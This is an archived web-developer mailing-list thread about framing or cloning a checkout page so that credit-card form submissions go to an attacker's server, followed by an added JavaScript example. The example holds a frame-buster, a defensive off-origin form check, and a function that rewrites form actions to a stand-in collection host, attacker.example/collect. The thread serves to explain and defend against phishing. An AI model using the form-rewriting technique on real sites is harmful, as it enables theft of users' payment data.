So I can have a frame load up amazon.com and check if they're on the page where 
they put in the credit card information and do the following: 
a.  read the information from the fields directly (would have to check it every 
few seconds and submit to the home server through ajax or something) 
b.  change the action in the form to have the form submit to my site, and then 
use my site to redirect back to amazon's action page (basically stealing the cc 
info, with the user not even knowing).  

I know I might get some warnings about security with b, since their site is on 
a secure server, and my action url is not.  But the whole point is, is it 
possible?  This really worries me that anybody can just do attacks like this to 
any site that doesn't have the 'bust out of frames' code in there.  

I know it's not technically XSS, but I'm not sure what else to call it.  I just 
haven't thought of this issue before and never heard it mentioned, so I wasn't 
sure if it's possible.  But if you are saying it is possible, then we're 
opening a whole can of worms here.  

Russ

This can has been open for some time now; you have just described the basic 
phishing scheme.  Create a clone site on a server I control.  Trick or entice 
users to my site instead of the original site.  Do nasty things with any data I 
can fool these people into providing me.  This has been going on for years.  I do 
not even need to use frames.  I could pull your page in server side and parse 
it back out.  I could just link to your page, but change some of the code (such 
as form actions) with regex.  Many ways to skin this cat.


--------------
Ian Skinner
Web Programmer
BloodSource
www.BloodSource.org
Sacramento, CA

"C code. C code run. Run code run. Please!"
- Cynthia Dunning
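The two messages above touch three pieces of mechanics: the "bust out of frames" check Russ mentions, the regex rewrite of form actions that Ian describes for a cloned or proxied page, and the mirror-image check a site owner can run to see whether a copy of their page still posts to their own origin. The following is an added example written for this thread, not code posted by Russ or Ian and not from any ColdFusion list project. The domains shop.example and attacker.example, the markup in ORIGINAL_PAGE and the function names are all constructed for illustration; it runs under Node.js with no dependencies.

```javascript
// Added example (not from the thread). Node.js, no dependencies.
// shop.example / attacker.example and the sample markup are constructed.

// 1. The "bust out of frames" check Russ refers to.  A page calls this on load
//    and, if it returns true, navigates the top window to its own URL.  The
//    window is passed in so the logic can be exercised with window-like mocks.
function isFramedByForeignPage(win) {
  if (win.top === win.self) return false;        // not inside any frame
  try {
    // A same-origin parent lets us read top.location; treat that as trusted.
    void win.top.location.href;
    return false;
  } catch (e) {
    // A cross-origin parent: the same-origin policy blocks the read.  That is
    // also why the framing page cannot read the card fields inside the frame.
    return true;
  }
}

// 2. What Ian describes: fetch the real page server side and point every form
//    at a host the attacker controls.  Only the action attribute is changed,
//    so the clone renders identically to the original.
function rewriteFormActions(html, newAction) {
  return html.replace(
    /(<form\b[^>]*?\baction\s*=\s*)(["']?)([^"'\s>]*)\2/gi,
    (match, prefix, quote) => `${prefix}${quote}${newAction}${quote}`
  );
}

// 3. The defender's check: list every form action on a page that does not
//    resolve to the origin the page is supposed to live on.  Relative actions
//    are resolved against the page URL, so "/checkout/payment" is not flagged.
function foreignFormActions(html, pageUrl) {
  const expected = new URL(pageUrl).origin;
  const foreign = [];
  const re = /<form\b[^>]*?\baction\s*=\s*(["']?)([^"'\s>]*)\1/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const target = new URL(m[2], pageUrl);
    if (target.origin !== expected) foreign.push(target.href);
  }
  return foreign;
}

// Constructed stand-in for a checkout page on shop.example.
const ORIGINAL_PAGE = [
  '<form method="post" action="/checkout/payment">',
  '  <input name="cc_number"><input name="cc_exp">',
  '</form>',
  '<form action="https://shop.example/search"><input name="q"></form>',
].join('\n');

const PAGE_URL = 'https://shop.example/checkout';
const CLONED_PAGE = rewriteFormActions(ORIGINAL_PAGE, 'https://attacker.example/collect');

console.log('original page, foreign actions:', foreignFormActions(ORIGINAL_PAGE, PAGE_URL));
console.log('cloned page, foreign actions:  ', foreignFormActions(CLONED_PAGE, PAGE_URL));
```

The regex rewrite is deliberately crude, matching Ian's "change some of the code with regex"; a real clone would also rewrite links and asset paths. One caveat on the frame-buster: script-based checks like isFramedByForeignPage can be defeated by a framing page that blocks navigation, so the robust control is a response header (X-Frame-Options, or Content-Security-Policy frame-ancestors) rather than JavaScript alone.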



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Message: http://www.houseoffusion.com/lists.cfm/link=i:4:229937
Archives: http://www.houseoffusion.com/cf_lists/threads.cfm/4
Subscription: http://www.houseoffusion.com/lists.cfm/link=s:4
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Donations & Support: http://www.houseoffusion.com/tiny.cfm/54